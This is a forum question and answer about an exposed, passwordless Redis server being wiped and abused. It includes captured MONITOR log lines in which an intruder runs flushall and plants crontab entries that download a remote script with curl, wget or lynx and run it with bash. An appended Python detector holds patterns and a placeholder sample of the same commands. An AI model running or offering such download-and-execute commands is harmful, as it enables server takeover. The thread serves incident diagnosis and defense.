0
votes

Hi, a strange issue is happening. I have a Google Cloud instance running Redis 4. The issue is that Redis data/keys are automatically removed some random number of hours or minutes after insertion.

When I use redis-cli with the MONITOR command, I find the following:

1525399477.663192 [0 122.114.179.53:47936] "info"
1525399487.102961 [0 122.114.179.53:55176] "COMMAND"
1525399487.546006 [0 122.114.179.53:55176] "flushall"
1525399488.214514 [0 122.114.179.53:55176] "set" "Backup1" "\t\n*/2 * * * * curl -s https://transfer.sh/mQnwD/tmp.CG62KOYFtW > .cmd && bash .cmd\n\t"
1525399488.435296 [0 122.114.179.53:55176] "set" "Backup2" "\t\n*/5 * * * * wget -O .cmd https://transfer.sh/mQnwD/tmp.CG62KOYFtW && bash .cmd\n\t"
1525399488.661485 [0 122.114.179.53:55176] "set" "Backup3" "\t\n*/10 * * * * lynx -source https://transfer.sh/mQnwD /tmp.CG62KOYFtW > .cmd && bash .cmd\n\t"

I have no idea about this IP address: 122.114.179.53

Thanks

1
Looks like your Redis is open to the world w/o a password... someone's trying to hack your server. - Itamar Haber

1 Answer

0
votes

It seems that your Google Compute Engine instance has been hacked.

I strongly recommend that you stop it, take a snapshot of the disk, and create a new instance with the snapshot of the affected instance attached as a secondary disk to perform a forensic analysis.
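As an added example (not code from the question, the answer, or Redis itself), a small Python checker that parses redis-cli MONITOR output of the kind shown in the question and flags the pattern it reveals: clients outside an assumed set of trusted networks, destructive commands such as flushall, and SET values carrying a crontab schedule followed by a download-and-run chain. The trusted networks, the sample events and the placeholder download URL are assumptions.

```python
import ipaddress
import re

# Shape of a redis-cli MONITOR line: <unix_ts> [<db> <ip>:<port>] "cmd" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<ip>[^:\]]+):(?P<port>\d+)\] (?P<rest>.*)$')
# Double-quoted arguments as redis-cli prints them; backslash escapes are kept literally.
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Commands an intruder typically issues against an unauthenticated instance.
DESTRUCTIVE = {"flushall", "flushdb", "config", "slaveof", "replicaof", "debug"}
# A crontab schedule followed by a download-and-run chain, the pattern seen in the question.
CRON_PAYLOAD_RE = re.compile(r'(\*/\d+|\*)\s+\*\s+\*\s+\*\s+\*\s+.*\b(curl|wget|lynx|bash|sh)\b')
# Assumed: networks from which Redis clients are expected; anything else counts as external.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in
                ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def parse_monitor_line(line):
    """Return {'ts', 'db', 'ip', 'port', 'args'} for one MONITOR line, or None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["args"] = ARG_RE.findall(ev.pop("rest"))
    return ev

def analyze_monitor(lines):
    """One finding per event that looks like abuse of an exposed, passwordless Redis."""
    findings = []
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None or not ev["args"]:
            continue
        cmd, reasons = ev["args"][0].lower(), []
        if not any(ipaddress.ip_address(ev["ip"]) in net for net in TRUSTED_NETS):
            reasons.append("client outside trusted networks")
        if cmd in DESTRUCTIVE:
            reasons.append("destructive command: " + cmd)
        if cmd == "set" and len(ev["args"]) >= 3 and CRON_PAYLOAD_RE.search(ev["args"][2]):
            reasons.append("cron-style download-and-execute payload stored as a value")
        if reasons:
            findings.append({"ts": ev["ts"], "ip": ev["ip"], "cmd": cmd, "reasons": reasons})
    return findings

# Constructed sample: two events modeled on the question's MONITOR output (download URL
# replaced by a placeholder) plus one benign request from localhost that must not be flagged.
SAMPLE = [
    r'1525399487.546006 [0 122.114.179.53:55176] "flushall"',
    r'1525399488.214514 [0 122.114.179.53:55176] "set" "Backup1" "\t\n*/2 * * * * curl -s https://example.invalid/payload > .cmd && bash .cmd\n\t"',
    r'1525399500.000000 [0 127.0.0.1:40000] "get" "user:42"',
]
```

Feeding the full output of `redis-cli MONITOR` (or the relevant slice of a saved capture) through analyze_monitor gives a timestamped list of the suspicious events to include in the forensic timeline the answer recommends.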